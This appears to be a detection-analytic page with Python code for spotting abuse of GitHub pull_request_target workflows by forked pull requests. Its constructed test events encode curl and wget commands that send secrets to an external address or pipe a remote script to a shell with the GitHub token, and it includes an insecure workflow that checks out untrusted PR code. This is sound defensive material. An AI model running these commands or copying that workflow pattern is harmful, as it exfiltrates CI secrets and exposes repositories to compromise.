Detects anomalous CI/CD workflow execution originating from forked repositories, where pull request (PR) metadata or commit messages contain suspicious patterns (e.g., encoded payloads), coupled with the use of insecure pipeline triggers such as `pull_request_target` or an unusually high rate of CI/CD secret access within a single run. `pull_request_target` is the risky trigger because the workflow runs in the context of the base repository, with its secrets and write permissions, while the PR that fired it can come from any fork; a workflow that checks out the PR head under that trigger executes untrusted code with those secrets. Correlating the trigger with unusual artifact generation, or with secret exfiltration via encoded content or external network destination URLs, is what separates an attack from an ordinary fork contribution.
| Data Component | Name | Channel |
|---|---|---|
| Cloud Service Modification (DC0069) | saas:github | Workflow triggered via pull_request_target from forked repo |
| Cloud Service Metadata (DC0070) | saas:github | CI/CD secret accessed or exported |
| Cloud Storage Access (DC0025) | saas:github | Artifact generated includes base64/encoded exfil payload or URL |
| File Metadata (DC0059) | saas:RepoEvents | New file added or modified in PR targeting CI/CD or build config (e.g., `.gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`) |
| Command Execution (DC0064) | saas:PRMetadata | Commit message or branch name contains encoded strings or payload indicators |

| Field | Description |
|---|---|
| TimeWindow | Time delta between PR creation and workflow execution; very short deltas flag rapid, likely automated attempts |
| UserContext | Forked or external (non-member) user accounts triggering workflows; the trusted set differs across organizations |
| TriggerTypeAllowlist | CI trigger types permitted for fork-originated PRs; `pull_request_target` should normally be excluded, since it runs with the base repository's secrets |
| ArtifactEntropyThreshold | Shannon entropy (bits per character) above which a string in an artifact is treated as an encoded payload; keep it above 4.0 so hexadecimal digests such as checksums, which cannot exceed 4 bits per character, are not flagged |
| SecretAccessRateThreshold | Number of secret accesses within a single workflow run above which the run is flagged as possible abuse |
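The correlation described above, as an added example in Python that is not part of the original page: it walks a list of constructed CI/CD events (the event shapes, field names, threshold values and the 203.0.113.7 destination are all assumptions, not a GitHub audit-log schema), applies each tunable from the table, and raises an alert only when a precursor (fork PR on a denylisted trigger, rapid trigger, CI config touched) coincides with a confirming signal (secret access rate, encoded artifact payload, external destination, encoded PR metadata). The encoded-payload check pairs a base64-shape regex with a Shannon-entropy threshold, so a hex checksum in build output, which caps at 4.0 bits per character, does not trip it.

```python
# Added example, not code from the original page and not a GitHub API schema: event
# dicts, field names, regexes and thresholds are assumptions; sample events are constructed.
import base64
import math
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Tunables, one per mutable field in the table above (values are assumptions).
TIME_WINDOW = timedelta(minutes=5)                 # PR created -> workflow started
FORK_TRIGGER_DENYLIST = {"pull_request_target", "workflow_run"}  # inverse of TriggerTypeAllowlist
ARTIFACT_ENTROPY_THRESHOLD = 4.1                   # bits/char; hex digests never exceed 4.0
SECRET_ACCESS_RATE_THRESHOLD = 5                   # secret reads within one run
TRUSTED_ACTORS = {"alice-maintainer"}              # UserContext: org members
ALLOWED_HOSTS = {"github.com", "api.github.com"}

CI_CONFIG_RE = re.compile(r"(^|/)(\.github/workflows/[^/]+\.ya?ml|\.gitlab-ci\.yml|build\.gradle|pom\.xml)$")
B64_RUN_RE = re.compile(r"(?:[A-Za-z0-9+/]{4}){10,}={0,2}")  # 40+ base64 chars
URL_HOST_RE = re.compile(r"https?://([^\s/\"']+)")
# pull_request_target plus a checkout of the PR head: fork code runs with base-repo secrets
RISKY_WORKFLOW_RE = re.compile(r"pull_request_target[\s\S]*github\.event\.pull_request\.head")

def shannon_entropy(s):
    return -sum(c / len(s) * math.log2(c / len(s)) for c in Counter(s).values()) if s else 0.0

def encoded_runs(text):
    """Base64-shaped runs whose entropy clears the threshold (hex digests do not)."""
    return [m.group(0) for m in B64_RUN_RE.finditer(text)
            if shannon_entropy(m.group(0)) >= ARTIFACT_ENTROPY_THRESHOLD]

def external_hosts(text):
    return sorted({h for h in URL_HOST_RE.findall(text) if h not in ALLOWED_HOSTS})

def assess(events):
    """{run_id: (precursors, confirmations)}: precursors say a run could be abused,
    confirmations (secret rate, encoded payload, external host, encoded metadata) say it was."""
    prs = {e["pr"]: e for e in events if e["type"] == "pull_request"}
    secrets, artifacts = Counter(), defaultdict(list)
    for e in events:
        if e["type"] == "secret_access":
            secrets[e["run_id"]] += 1
        elif e["type"] == "artifact":
            artifacts[e["run_id"]].append(e["content"])
    result = {}
    for run in (e for e in events if e["type"] == "workflow_run"):
        pr, pre, conf = prs[run["pr"]], [], []
        untrusted = pr["from_fork"] or pr["actor"] not in TRUSTED_ACTORS
        if untrusted and run["trigger"] in FORK_TRIGGER_DENYLIST:
            pre.append(f"{run['trigger']} fired for fork PR by {pr['actor']}")
        delta = datetime.fromisoformat(run["ts"]) - datetime.fromisoformat(pr["ts"])
        if untrusted and delta <= TIME_WINDOW:
            pre.append(f"workflow started {int(delta.total_seconds())}s after PR creation")
        for path, patch in pr["files"].items():
            if CI_CONFIG_RE.search(path):
                pre.append(f"CI config modified: {path}")
                if RISKY_WORKFLOW_RE.search(patch):
                    pre.append(f"{path} checks out the PR head under pull_request_target")
        if secrets[run["run_id"]] >= SECRET_ACCESS_RATE_THRESHOLD:
            conf.append(f"{secrets[run['run_id']]} secret reads in one run")
        for content in artifacts[run["run_id"]]:
            if encoded_runs(content):
                conf.append("encoded payload in artifact")
            if hosts := external_hosts(content):
                conf.append(f"external destination in artifact: {hosts}")
        if any(encoded_runs(s) for s in pr["commits"] + [pr["branch"], pr["title"]]):
            conf.append("encoded string in commit message, branch or title")
        result[run["run_id"]] = (pre, conf)
    return result

def alerts(events):
    """Run ids where a precursor coincides with at least one confirmation."""
    return sorted(r for r, (pre, conf) in assess(events).items() if pre and conf)

# Constructed sample data; 203.0.113.7 is a documentation-range address.
PAYLOAD = base64.b64encode(b"curl -d @secrets.json https://203.0.113.7/collect").decode()
LOADER = base64.b64encode(b"wget -qO- https://203.0.113.7/s.sh | sh -s -- $GITHUB_TOKEN").decode()
RISKY_WORKFLOW = ("on: pull_request_target\njobs:\n  build:\n    steps:\n      - uses: actions/checkout@v4\n"
                  "        with:\n          ref: ${{ github.event.pull_request.head.sha }}\n"
                  "      - run: npm install && npm test\n")
SAMPLE_EVENTS = [
    {"type": "pull_request", "pr": 17, "ts": "2024-05-01T10:00:00+00:00", "actor": "drive-by-dev",
     "from_fork": True, "branch": "patch-1", "title": "Fix typo in README", "commits": ["chore: " + LOADER],
     "files": {".github/workflows/ci.yml": RISKY_WORKFLOW, "README.md": "-typ\n+typo"}},
    {"type": "workflow_run", "run_id": 9001, "pr": 17, "ts": "2024-05-01T10:00:40+00:00",
     "trigger": "pull_request_target"},
    *[{"type": "secret_access", "run_id": 9001, "secret": f"SECRET_{i}"} for i in range(6)],
    {"type": "artifact", "run_id": 9001, "name": "build.log",
     "content": f"Build succeeded\n{PAYLOAD}\nPOST https://203.0.113.7/collect 200\n"},
    {"type": "pull_request", "pr": 18, "ts": "2024-05-01T11:00:00+00:00", "actor": "alice-maintainer",
     "from_fork": False, "branch": "feature/logging", "title": "Add request logging",
     "commits": ["Add request logging"], "files": {"src/app.py": "+import logging"}},
    {"type": "workflow_run", "run_id": 9002, "pr": 18, "ts": "2024-05-01T11:00:30+00:00",
     "trigger": "pull_request"},
    {"type": "secret_access", "run_id": 9002, "secret": "CODECOV_TOKEN"},
    {"type": "artifact", "run_id": 9002, "name": "build.log",  # hex digest: shape matches, entropy does not
     "content": "42 tests passed\nsha256 " + "deadbeef" * 8 + "\nhttps://github.com/org/repo/actions/runs/9002\n"},
]
```

Running `alerts(SAMPLE_EVENTS)` returns only run 9001; the maintainer's run 9002 produces neither precursors nor confirmations because its actor is trusted, its trigger is `pull_request`, and the checksum in its log falls below the entropy threshold despite matching the base64 shape. The precursor/confirmation split is the practical point: a fork PR on `pull_request_target` alone is noisy in repositories that use the trigger legitimately, so the alert fires only when the run also touches secrets or artifacts in the ways the data components above describe.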